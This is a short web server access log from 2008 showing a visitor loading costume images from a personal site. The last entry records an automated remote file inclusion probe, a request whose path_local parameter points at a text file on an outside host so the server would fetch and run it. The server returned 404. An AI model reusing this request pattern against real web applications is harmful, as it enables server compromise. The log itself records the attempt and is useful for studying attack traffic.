170.185.56.19 - - [22/Aug/2008:09:09:17 -0500] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:17 -0500] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
170.185.56.19 - - [22/Aug/2008:09:09:17 -0500] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MathPlayer 2.0; .NET CLR 1.1.4322)"
87.230.21.231 - - [22/Aug/2008:09:09:19 -0500] "GET /logs/db.php?path_local=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
